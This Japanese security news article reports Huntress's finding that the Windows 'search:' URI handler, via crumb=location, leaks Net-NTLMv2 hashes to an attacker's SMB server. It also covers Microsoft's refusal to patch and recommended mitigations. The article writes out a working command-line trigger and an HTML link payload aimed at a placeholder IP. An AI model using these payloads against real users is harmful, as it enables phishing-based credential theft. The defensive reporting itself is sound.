Windows の NTLMv2 ハッシュ漏洩の脆弱性 CVE-N/A:Huntress がエクスプロイトを確認

Windows Search URI Handler Flaw Leaks NTLMv2 Hashes to Attacker-Controlled Servers

2026/06/03 CyberSecurityNews — Windows の “search URI” ハンドラーで発見された脆弱性 CVE-N/A により、攻撃者が用意したサーバへ向けて NTLMv2 ハッシュが漏洩する可能性がある。この挙動は、Snipping Tool の CVE-2026-33829 と同一クラスのバグであり、ユーザーによる 1 回のリンク・クリックで発生するものであるが、Microsoft は CVE 割り当ても修正も行っていない。

2026年4月14日に Microsoft は、Snipping Tool の “ms-screensketch: URI” ハンドラーに存在する、NTLM 認証情報漏洩の脆弱性 CVE-2026-33829 を修正した。

このバグを悪用する攻撃者は、filePath パラメータにリモート UNC パスを指定し、外部 SMB 認証を強制的に発生させることで、被害者の Net-NTLMv2 ハッシュを漏洩させる可能性があった。

通常のリンクのように見えるものをユーザーがクリックするだけで、端末が攻撃者の SMB サーバに対して自動的に認証通信を行う問題が生じていた。

Windows Search URI 脆弱性による漏洩

Huntress が確認したのは、同様のプリミティブが Windows の “search URI” ハンドラーにも存在することだった。filePath の代わりに “crumb=location” を使用することで、攻撃者の SMB エンドポイントへ Net-NTLMv2 ハッシュが送信されてしまう。

この脆弱性は、Windows 11 25H2 Pro (Build 26200.8524) 上で再現されているが、その際の条件は、標準のユーザー権限とデフォルトの Defender 設定を用いるものであり、特別な開発者の設定は不要である。

コマンドプロンプトから、以下を実行するだけで漏洩が発生する。

start “” “search:query=test&crumb=location:\10.0.1.100\share”

Left: cmd start "" triggers an access-denied dialog. Right: Responder captures tony.soprano::NEWJERSEY seconds after the URI fires ( source : huntress )

Left: cmd start "" triggers an access-denied dialog. Right: Responder captures tony.soprano::NEWJERSEY seconds after the URI fires ( source: huntress )

引用符および start “” のラッパーが重要であり、これがない場合には “&” がコマンド区切りとして解釈され、ペイロードは正常に実行されない。

正しくトリガーされると、Windows はアクセス拒否のダイアログを表示するが、その時点では、リモートサーバへの NTLMv2 ハッシュ送信が完了している。

ログオン・セッションごとに、最初の 1 回でのみハッシュが漏洩し、その後はログオフするまでアクセス拒否となる。しかしフィッシングにおいては、この 1 回で十分である。

A single malicious search: link in Edge can leak NTLMv2 hashes to attacker-controlled servers without prompts( source : huntress )
A single malicious search: link in Edge can leak NTLMv2 hashes to attacker-controlled servers without prompts (source: Huntress)

この攻撃は、以下のようなリンクをブラウザに埋め込むことで成立するが、その用途はコマンド実行だけに限定されない。

<a href=”search:query=test&crumb=location:\\10.0.1.100\share”>click</a>

Microsoft Edge などのブラウザで、この URI を読み込むと、プロンプトを表示することなく SMB 認証が発生し、攻撃者が Responder を実行しているホストへ向けてハッシュが送信される。

内部的には、search と search-ms は HKCR 上で別々に登録されているが、同一のコマンドラインと DelegateExecute CLSID {90b9bce2-b6db-4fd3-8451-35917ea1081b} を共有しており、ExplorerFrame.dll 内の SearchExecute (CLSID_SearchMSExecute) COM クラスにマッピングされている。

つまり、この 2つの URI スキームは同一の COM アクティベーション・パスを通過するため、SearchExecute における入力検証の不備は両方に影響する。

根本的な修正は URI 登録レベルではなく、SearchExecute または Explorer の検索処理に対して実装される必要がある。

2024年に Varonis は、search-ms 経由で UNC ベースの NTLM 漏洩を引き起こす、プリミティブの crumb location を文書化した。また、2023年に Trellix は、攻撃対象領域としての search: について文書化している。

ただし、search: と crumb=location を組み合わせた NTLM 漏洩の手法は、今回が初めての報告だとされる。

以前の脆弱性 CVE-2026-33829 と Huntress が発見した search の問題は、同一クラス (URI ハンドラ経由の NTLM 漏洩) に属し、CVSS ベクターも同一 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) であり、深刻度は Moderate と評価されている。

Same command and DelegateExecute CLSID enable two URI schemes through one COM activation path( source : huntress )
Same command and DelegateExecute CLSID enable two URI schemes through one COM activation path( source : huntress )

Microsoft は Snipping Tool にはパッチと CVE を割り当てたが、その一方で、この件についてはサービス基準に満たない修正対象外とし、個別対応で判断するとしている。

この種の NTLM 漏洩全体に対する最も有効な対策として、Huntress が推奨するのは、不要なホストからのアウトバウンド SMB (TCP 445 および 139) をブロックすることだ。

さらに、SMB 署名の強制/NTLM の制限または無効化 (例: RestrictSendingNTLMTraffic を 2 に設定、事前監査が必要)/メールやプロキシログにおける search: / search-ms: URI の検知を行うことで、リスクを大幅に低減できるとしている。

訳者後書:今回の Windows の URI ハンドラーに関する問題は、外部から指定されたリモートパスに対する認証通信の検証不備が原因となっています。以前の CVE-2026-33829 と同様の脆弱性が、検索処理を行うプログラムである SearchExecute の入力検証に存在します。具体的には、ブラウザなどで特定のリンクをクリックした際の、システムが内部で共有する処理パスを通過する過程において、攻撃者が用意した外部の共有サーバへ向けて自動的に認証通信を発生させてしまう設計上の弱点があります。その結果、本人確認に使われる重要な Net-NTLMv2 ハッシュデータがプロンプト表示なしに外部へ漏洩する状態を招いています。ご利用のチームは、ご注意ください。よろしければ、2026/04/17 の「Windows Snipping Tool の脆弱性 CVE-2026-33829:NTLM リークと PoC の存在」も、ご参照ください。